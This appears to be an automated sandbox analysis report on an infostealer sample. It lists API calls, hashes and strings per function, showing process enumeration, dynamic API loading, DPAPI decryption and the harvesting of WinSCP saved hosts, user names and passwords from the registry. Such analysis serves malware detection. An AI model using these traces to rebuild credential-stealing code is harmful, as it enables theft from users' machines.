Opcode Fuzzy Hash: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction Fuzzy Hash: D4F02774B00214ABD72C6B689C1EFAE7B1E8B82211F444355FE06CB2C0EAB00C1486D5

Uniqueness

Uniqueness Score: -1.00%

Function 00410B00 Relevance: 7.6, APIs: 5, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Process32Next.KERNEL32(00000000,00000128), ref: 00410B71

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
CloseHandle.KERNEL32(00000000), ref: 00410BE9

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 562399079-0
Opcode ID: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction ID: 6e6253c0bc7aca0069297d9a5e7774d33834fdaa728087442e1970efbb29e10a
Opcode Fuzzy Hash: 369a376b949f67af27a7357904d7b6bb84a3d9ea30938c9ace032f397cd0092c
Instruction Fuzzy Hash: BA21A271A00118EBCB10DFE5DC44BEEB7BCBB49B14F50416EF505A3281DBB85A498B64

Uniqueness

Uniqueness Score: -1.00%

Function 00411C50 Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411C89
Process32First.KERNEL32(00000000,00000128), ref: 00411C99
Process32Next.KERNEL32(00000000,00000128), ref: 00411CAB
StrCmpCA.SHLWAPI(?,?), ref: 00411CC0
CloseHandle.KERNEL32(00000000), ref: 00411CE2

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction ID: 08e3f1599d3a10f929bed3b41f19ba99720e1616bff5518888d5ac45308be21b
Opcode Fuzzy Hash: e120b0d07bdf31c389443beb48283bc8594b3319a78ddf412cd309071a7f6763
Instruction Fuzzy Hash: CD11BF76A01518ABC721CF89DC44BDEFBB9FB86710F204296FA05D3250D7345A40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004117A0 Relevance: 6.1, APIs: 4, Instructions: 63memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
RtlAllocateHeap.NTDLL(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocateBinaryCryptProcessString
String ID:
API String ID: 869800140-0
Opcode ID: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction ID: 21c28c5b9c274bc113086ca6f345efa6a7341173b31fdfb7d0b317eddc9c08d9
Opcode Fuzzy Hash: 69daf7a4aa169d0d5591cf2b5354aaf80487d25cb4358fc80a862e26d396d330
Instruction Fuzzy Hash: 3F111275200209ABDB10DFA5EC85EEB77EDEF4A351F10455AFD18D7340D7719C518AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00410449 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
String ID: /
API String ID: 3280604673-4001269591
Opcode ID: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction ID: 18608df84cbcd0239a302a1ab97b581227ab4f7f43221c1533691961591ac6d2
Opcode Fuzzy Hash: c5095870504de8671e1cab0cdd93b783f671ea86860926cedbc76158b19dad67
Instruction Fuzzy Hash: 53116031A00119EACB14DBD4D885BFDB7B9BF18304F1400AEF609B3182DBB85AC4CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00406F90 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
LocalFree.KERNEL32(?), ref: 00406FEE

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction ID: 09355a3e94bf7739add38d711f9a133fcae8b2d8c69785aff26ce7a8339e2a5e
Opcode Fuzzy Hash: 7e7d3b06b1e5fd7aad560c52886b42979d5c356489e58cd0cd5d5ac190b8b534
Instruction Fuzzy Hash: 3B01E17960020AAFDB14DFA9DC55FAE77B9EF88B00F104559FA05AB380D675ED00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410280 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 0041028C
HeapAlloc.KERNEL32(00000000,?,014532E8,?,00401074,014532E8,?,0041887F), ref: 00410293
GetUserNameA.ADVAPI32(00000000,014532E8), ref: 004102A7

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction ID: 9804d81a03a056e57ee932ac7c1dbb4061c4f1b1a4941ccfe0fe277252d65891
Opcode Fuzzy Hash: 76dc38081e46b429b0fd107566edaafadbf0ec5ab863df2dfa0e2965dd2e5576
Instruction Fuzzy Hash: EED012B5541219BBD7109BD49C4DADB7BADDB0A751F501192FB05D3240D5F0590087E1

Uniqueness

Uniqueness Score: -1.00%

Function 004105A0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004105AD
wsprintfA.USER32 ref: 004105C3

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction ID: 02812af920acb22cdc7078cfa6f9a81c02f6a6398f02c401a58ac9223811f8c5
Opcode Fuzzy Hash: df8f2003c154096ee6bab9342032087ac5f8666e1f2cf3cadbe6a54d86bda0d6
Instruction Fuzzy Hash: 81D0C2B980010C97C710DB90EC859E9B3BCAB04200F404295EF04A3180E7756A1DCAE5

Uniqueness

Uniqueness Score: -1.00%

Function 00418CB0 Relevance: 207.2, APIs: 114, Strings: 4, Instructions: 691
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76210000,01452840), ref: 00418CC5
GetProcAddress.KERNEL32(76210000,014529E0), ref: 00418CDD
GetProcAddress.KERNEL32(76210000,0145D9C0), ref: 00418CF6
GetProcAddress.KERNEL32(76210000,0145DBA0), ref: 00418D0E
GetProcAddress.KERNEL32(76210000,0145DA08), ref: 00418D26
GetProcAddress.KERNEL32(76210000,0145DA38), ref: 00418D3F
GetProcAddress.KERNEL32(76210000,01453A38), ref: 00418D57
GetProcAddress.KERNEL32(76210000,0145DA50), ref: 00418D6F
GetProcAddress.KERNEL32(76210000,0145DB40), ref: 00418D88
GetProcAddress.KERNEL32(76210000,0145DB28), ref: 00418DA0
GetProcAddress.KERNEL32(76210000,0145DA68), ref: 00418DB8
GetProcAddress.KERNEL32(76210000,01452A60), ref: 00418DD1
GetProcAddress.KERNEL32(76210000,01452AE0), ref: 00418DE9
GetProcAddress.KERNEL32(76210000,01452900), ref: 00418E01
GetProcAddress.KERNEL32(76210000,01452920), ref: 00418E1A
GetProcAddress.KERNEL32(76210000,0145DB70), ref: 00418E32
GetProcAddress.KERNEL32(76210000,0145DB88), ref: 00418E4A
GetProcAddress.KERNEL32(76210000,01453AB0), ref: 00418E63
GetProcAddress.KERNEL32(76210000,01452B00), ref: 00418E7B
GetProcAddress.KERNEL32(76210000,0145DBD0), ref: 00418E93
GetProcAddress.KERNEL32(76210000,0145DBB8), ref: 00418EAC
GetProcAddress.KERNEL32(76210000,0145DA80), ref: 00418EC4
GetProcAddress.KERNEL32(76210000,0145DCC0), ref: 00418EDC
GetProcAddress.KERNEL32(76210000,01452CC0), ref: 00418EF5
GetProcAddress.KERNEL32(76210000,0145DCD8), ref: 00418F0D
GetProcAddress.KERNEL32(76210000,0145DCF0), ref: 00418F25
GetProcAddress.KERNEL32(76210000,0145DD38), ref: 00418F3E
GetProcAddress.KERNEL32(76210000,0145DD20), ref: 00418F56
GetProcAddress.KERNEL32(76210000,0145DD08), ref: 00418F6E
GetProcAddress.KERNEL32(76210000,0145DD50), ref: 00418F87
GetProcAddress.KERNEL32(76210000,0145DD68), ref: 00418F9F
GetProcAddress.KERNEL32(76210000,0145DCA8), ref: 00418FB7
GetProcAddress.KERNEL32(76210000,01461430), ref: 00418FD0
GetProcAddress.KERNEL32(76210000,0145C330), ref: 00418FE8
GetProcAddress.KERNEL32(76210000,01461448), ref: 00419000
GetProcAddress.KERNEL32(76210000,014614F0), ref: 00419019
GetProcAddress.KERNEL32(76210000,01452F00), ref: 00419031
GetProcAddress.KERNEL32(76210000,014614A8), ref: 00419049
GetProcAddress.KERNEL32(76210000,01452E00), ref: 00419062
GetProcAddress.KERNEL32(76210000,014614D8), ref: 0041907A
GetProcAddress.KERNEL32(76210000,014614C0), ref: 00419092
GetProcAddress.KERNEL32(76210000,01452DC0), ref: 004190AB
GetProcAddress.KERNEL32(76210000,01452C60), ref: 004190C3
LoadLibraryA.KERNEL32(01461460,0041807F,?,00000040,00000064,004144A0,00413A10,?,0000002C,00000064,004143F0,00414440,?,00000024,00000064,00414340), ref: 004190D5
LoadLibraryA.KERNEL32(01461478), ref: 004190E6
LoadLibraryA.KERNEL32(01461490), ref: 004190F8
LoadLibraryA.KERNEL32(014613E8), ref: 0041910A
LoadLibraryA.KERNEL32(01461250), ref: 0041911B
LoadLibraryA.KERNEL32(01461220), ref: 0041912D
LoadLibraryA.KERNEL32(01461238), ref: 0041913F
LoadLibraryA.KERNEL32(01461130), ref: 00419150
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00419160
GetProcAddress.KERNEL32(751E0000,01452DA0), ref: 0041917C
GetProcAddress.KERNEL32(751E0000,014611A8), ref: 00419194
GetProcAddress.KERNEL32(751E0000,0145F5F0), ref: 004191AD
GetProcAddress.KERNEL32(751E0000,01461400), ref: 004191C5
GetProcAddress.KERNEL32(751E0000,01452D20), ref: 004191DD
GetProcAddress.KERNEL32(73F70000,01453B00), ref: 004191FD
GetProcAddress.KERNEL32(73F70000,01452E40), ref: 00419215
GetProcAddress.KERNEL32(73F70000,01453880), ref: 0041922E
GetProcAddress.KERNEL32(73F70000,014613D0), ref: 00419246
GetProcAddress.KERNEL32(73F70000,01461418), ref: 0041925E
GetProcAddress.KERNEL32(73F70000,01452FE0), ref: 00419277
GetProcAddress.KERNEL32(73F70000,01452FC0), ref: 0041928F
GetProcAddress.KERNEL32(73F70000,014612E0), ref: 004192A7
GetProcAddress.KERNEL32(753A0000,01452EC0), ref: 004192C3
GetProcAddress.KERNEL32(753A0000,01452E80), ref: 004192DB
GetProcAddress.KERNEL32(753A0000,01461148), ref: 004192F4
GetProcAddress.KERNEL32(753A0000,01461280), ref: 0041930C
GetProcAddress.KERNEL32(753A0000,01452EA0), ref: 00419324
GetProcAddress.KERNEL32(76310000,01453B78), ref: 00419344
GetProcAddress.KERNEL32(76310000,01453948), ref: 0041935C
GetProcAddress.KERNEL32(76310000,01461310), ref: 00419375
GetProcAddress.KERNEL32(76310000,01452F80), ref: 0041938D
GetProcAddress.KERNEL32(76310000,01452EE0), ref: 004193A5
GetProcAddress.KERNEL32(76310000,014538A8), ref: 004193BE
GetProcAddress.KERNEL32(76910000,01461208), ref: 004193DE
GetProcAddress.KERNEL32(76910000,01452E20), ref: 004193F6
GetProcAddress.KERNEL32(76910000,0145F640), ref: 0041940F
GetProcAddress.KERNEL32(76910000,01461298), ref: 00419427
GetProcAddress.KERNEL32(76910000,014611D8), ref: 0041943F
GetProcAddress.KERNEL32(76910000,01452FA0), ref: 00419458
GetProcAddress.KERNEL32(76910000,01452F20), ref: 00419470
GetProcAddress.KERNEL32(76910000,01461160), ref: 00419488
GetProcAddress.KERNEL32(76910000,014612C8), ref: 004194A1
GetProcAddress.KERNEL32(75B30000,01452E60), ref: 004194BD
GetProcAddress.KERNEL32(75B30000,01461328), ref: 004194D5
GetProcAddress.KERNEL32(75B30000,01461268), ref: 004194EE
GetProcAddress.KERNEL32(75B30000,014612B0), ref: 00419506
GetProcAddress.KERNEL32(75B30000,01461340), ref: 0041951E
GetProcAddress.KERNEL32(75670000,01452F40), ref: 0041953A
GetProcAddress.KERNEL32(75670000,01452CA0), ref: 00419552
GetProcAddress.KERNEL32(76AC0000,01452D40), ref: 0041956E
GetProcAddress.KERNEL32(76AC0000,01461358), ref: 00419586
GetProcAddress.KERNEL32(6F500000,01452F60), ref: 004195A6
GetProcAddress.KERNEL32(6F500000,01452D60), ref: 004195BE
GetProcAddress.KERNEL32(6F500000,01452C40), ref: 004195D7
GetProcAddress.KERNEL32(6F500000,01461178), ref: 004195EF
GetProcAddress.KERNEL32(6F500000,01452CE0), ref: 00419607
GetProcAddress.KERNEL32(6F500000,01452C80), ref: 00419620
GetProcAddress.KERNEL32(6F500000,01452DE0), ref: 00419638
GetProcAddress.KERNEL32(6F500000,01452D00), ref: 00419650
GetProcAddress.KERNEL32(6F500000,HttpQueryInfoA), ref: 00419667
GetProcAddress.KERNEL32(6F500000,InternetSetOptionA), ref: 0041967E
GetProcAddress.KERNEL32(75AE0000,01461190), ref: 0041969A
GetProcAddress.KERNEL32(75AE0000,0145F6E0), ref: 004196B2
GetProcAddress.KERNEL32(75AE0000,014611C0), ref: 004196CB
GetProcAddress.KERNEL32(75AE0000,014612F8), ref: 004196E3
GetProcAddress.KERNEL32(76300000,01452D80), ref: 004196FF
GetProcAddress.KERNEL32(6D170000,014611F0), ref: 0041971B
GetProcAddress.KERNEL32(6D170000,014618D8), ref: 00419733
GetProcAddress.KERNEL32(6D170000,01461370), ref: 0041974C
GetProcAddress.KERNEL32(6D170000,01461388), ref: 00419764
GetProcAddress.KERNEL32(6CF80000,SymMatchString), ref: 0041977E

Strings

SymMatchString, xrefs: 00419778
InternetSetOptionA, xrefs: 00419673
HttpQueryInfoA, xrefs: 0041965C
dbghelp.dll, xrefs: 00419156

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction ID: c5f05c92df86ae6c309de6d93bbb22230759f21ed052dce6c69101577189e498
Opcode Fuzzy Hash: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction Fuzzy Hash: F06210BD6002029FD744DFA5ECA896637FBF78BB413A06519FA05C7364E734A885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040C550 Relevance: 87.9, APIs: 36, Strings: 14, Instructions: 371
stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C58B
memset.MSVCRT ref: 0040C5AA
memset.MSVCRT ref: 0040C5C2
memset.MSVCRT ref: 0040C5DA
memset.MSVCRT ref: 0040C5ED
memset.MSVCRT ref: 0040C5FB
memset.MSVCRT ref: 0040C60C
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,000000FF), ref: 0040C62E
RegGetValueA.ADVAPI32(000000FF,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C69E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,000000FF), ref: 0040C6D6
RegEnumKeyExA.ADVAPI32(000000FF,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C718
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C72C
HeapAlloc.KERNEL32(00000000), ref: 0040C733
lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
lstrcat.KERNEL32(00421610,?), ref: 0040C78C
RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
lstrcat.KERNEL32(00421610,?), ref: 0040C848
lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921

Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B

memset.MSVCRT ref: 0040C932
memset.MSVCRT ref: 0040C940
lstrlen.KERNEL32(00421610), ref: 0040C958
memset.MSVCRT ref: 0040C9AB

Strings

Soft: WinSCP, xrefs: 0040C746
Security, xrefs: 0040C698
passwords.txt, xrefs: 0040C96B
UserName, xrefs: 0040C82E
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040C6CC
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040C61B
HostName, xrefs: 0040C772
Password, xrefs: 0040C86E
PortNumber, xrefs: 0040C7A3
Password: , xrefs: 0040C880
Host: , xrefs: 0040C755
:22, xrefs: 0040C7F3
Login: , xrefs: 0040C811
UseMasterPassword, xrefs: 0040C693

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$Value$EnumHeapOpen$AllocProcesslstrlenwsprintf
String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 4109173386-1250616252
Opcode ID: dd88397acad7059dfc11fc0bc3abe15bada8366f415904047003f7cb184d2dc8
Instruction ID: 39ec2e8349ec0f49430afd06625ec9b021e02694a525698c05ba917c3cb00e0c
Opcode Fuzzy Hash: dd88397acad7059dfc11fc0bc3abe15bada8366f415904047003f7cb184d2dc8
